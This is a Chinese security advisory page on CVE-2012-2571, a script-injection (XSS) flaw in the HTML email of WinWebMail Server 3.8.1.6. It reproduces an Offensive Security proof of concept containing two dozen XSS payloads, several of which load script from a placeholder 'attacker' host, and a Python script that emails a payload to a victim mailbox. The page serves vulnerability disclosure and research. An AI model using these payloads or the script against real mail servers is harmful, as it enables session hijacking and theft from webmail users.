首页 / 操作系统 / Linux / WinWebMail Server HTML Mail脚本插入漏洞

发布日期：2012-08-09
更新日期：2012-08-13受影响系统：
WinWebMail Server WinWebMail Server 3.x
描述：
--------------------------------------------------------------------------------
CVE ID: CVE-2012-2571WinWebMail Server是Windows平台上的多功能Web邮件服务器。WinWebMail Server 3.8.1.6及其他版本在实现上存在安全漏洞，HTML电子邮件中的输入没有正确过滤即被使用，可被利用插入任意HTML和脚本代码，在Web邮件接口中被打开后，可在受影响站点的用户浏览器会话中执行。<*来源：loneferret
 
  链接：http://www.exploit-db.com/exploits/20366/
        http://secunia.com/advisories/50213/
*>测试方法：
--------------------------------------------------------------------------------警 告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！#！/usr/bin/python"""Author: loneferret of Offensive Security
Product: WinWebMail Server
Version: 3.8.1.6
Vendor Site: http://www.winwebmail.net
Software Download: http://www.winwebmail.net/email-server-download.htmlTimeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: No response from vendor
08 Aug 2012: Public DisclosureInstalled On: Windows Server 2003 SP2
Client Test OS: Window 7 Pro SP1 （x86）
Browser Used: Internet Explorer 9Injection Point: Body
Injection Payload（s）:
1: ";alert（String.fromCharCode（88,83,83））//";alert（String.fromCharCode（88,83,83））//";alert（String.fromCharCode（88,83,83））//";alert（String.fromCharCode（88,83,83））//--></SCRIPT>">"><SCRIPT>alert（String.fromCharCode（88,83,83））</SCRIPT>=&{}
2: <SCRIPT>alert（"XSS"）</SCRIPT>
3: <SCRIPT SRC=http://attacker/xss.js></SCRIPT>
4: <SCRIPT>alert（String.fromCharCode（88,83,83））</SCRIPT>
5: <DIV STYLE="width: expression（alert（"XSS"））;">
6: <IFRAME SRC="javascript:alert（"XSS"）;"></IFRAME>
7: exp/*<XSS STYLE="noxss:noxss（"*//*"）;
xss:&#101;x&#x2F;*XSS*//*/*/pression（alert（"XSS"））">
8: <IMG STYLE="xss:expr/*XSS*/ession（alert（"XSS"））">
9: <XSS STYLE="xss:expression（alert（"XSS"））">
10: <！--[if gte IE 4]>
<SCRIPT>alert（"XSS"）;</SCRIPT>
<！[endif]--
11: <SCRIPT SRC="http://attacker/xss.jpg"></SCRIPT>
12: <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert（"XSS"）;+ADw-/SCRIPT+AD4-
13: </TITLE><SCRIPT>alert（"XSS"）;</SCRIPT>
14: <SCRIPT/XSS SRC="http://attacker/xss.js"></SCRIPT>
15: <<SCRIPT>alert（"XSS"）;//<</SCRIPT>
16: <IMG """><SCRIPT>alert（"XSS"）</SCRIPT>">
17: <SCRIPT>a=/XSS/
alert（a.source）</SCRIPT>
18: <SCRIPT a=">" SRC="http://attacker/xss.js"></SCRIPT>
19: <SCRIPT ="blah" SRC="http://attacker/xss.js"></SCRIPT>
20: <SCRIPT a="blah" "" SRC="http://attacker/xss.js"></SCRIPT>
21: <SCRIPT "a=">"" SRC="http://attacker/xss.js"></SCRIPT>
22: <SCRIPT a=`>` SRC="http://attacker/xss.js"></SCRIPT>
23: <SCRIPT>document.write（"<SCRI"）;</SCRIPT>PT SRC="http://attacker/xss.js"></SCRIPT>
24: <SCRIPT a=">">" SRC="http://attacker/xss.js"></SCRIPT>"""import smtplib, urllib2
 
payload = """<SCRIPT a=`>` SRC="http://attacker/xss.js"></SCRIPT>"""
 
def sendMail（dstemail, frmemail, smtpsrv, username, password）:
        msg  = "From: hacker@offsec.local "
        msg += "To: victim@victim.local "
        msg += "Date: Today "
        msg += "Subject: Offensive Security "
        msg += "Content-type: text/html "
        msg += "XSS" + payload + " "
        server = smtplib.SMTP（smtpsrv）
        server.login（username,password）
        try:
                server.sendmail（frmemail, dstemail, msg）
        except Exception, e:
                print "[-] Failed to send email:"
                print "[*] " + str（e）
        server.quit（）
 
username = "hacker@offsec.local"
password = "123456"
dstemail = "victim@victim.local"
frmemail = "hacker@offsec.local"
smtpsrv  = "172.16.84.171"
 
print "[*] Sending Email"
sendMail（dstemail, frmemail, smtpsrv, username, password）建议：
--------------------------------------------------------------------------------
厂商补丁：WinWebMail Server
-----------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://www.winwebmail.net/WordPress SimpleMail Plugin Email字段脚本插入漏洞Ruby on Rails "strip_tags（）"跨站脚本执行漏洞相关资讯      脚本插入漏洞 

Raidsonic ICY BOX NAS-4220-B /   （02/26/2013 09:01:26） ServersCheck Monitoring Software  （10/16/2012 06:34:40） HP AssetManager多个脚本插入漏洞  （07/16/2012 21:17:11）

ManageEngine ServiceDesk Plus “  （11/20/2012 18:55:35） RoundCube Webmail Larry皮肤邮件  （08/21/2012 06:40:36） Bricolage多个XSS脚本执行和脚本插  （06/21/2012 06:05:49）

本文评论 查看全部评论 （0）

表情： 姓名： 匿名字数 同意评论声明 发表 评论声明 尊重网上道德，遵守中华人民共和国的各项有关法律法规 承担一切因您的行为而直接或间接导致的民事或刑事法律责任 本站管理人员有权保留或删除其管辖留言中的任意内容 本站有权在网站内转载或引用您的评论 收藏该网址 版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图